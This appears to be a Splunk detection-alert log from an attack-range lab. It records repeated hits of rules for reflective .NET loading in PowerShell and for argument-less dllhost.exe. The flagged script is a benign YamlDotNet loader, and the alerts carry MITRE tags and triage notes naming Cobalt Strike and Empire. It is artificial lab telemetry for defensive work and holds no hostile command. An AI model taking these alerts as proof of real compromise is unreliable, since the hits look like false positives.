lastTime="2022-10-05T04:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664949332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T04:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T04:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664942400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664942400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="3440", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664945732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T03:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T03:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664945732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T03:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T03:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664945732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T03:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T03:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664945732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T03:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T03:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664938800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664938800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="3680", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664938800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664938800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xe60", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664942132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir 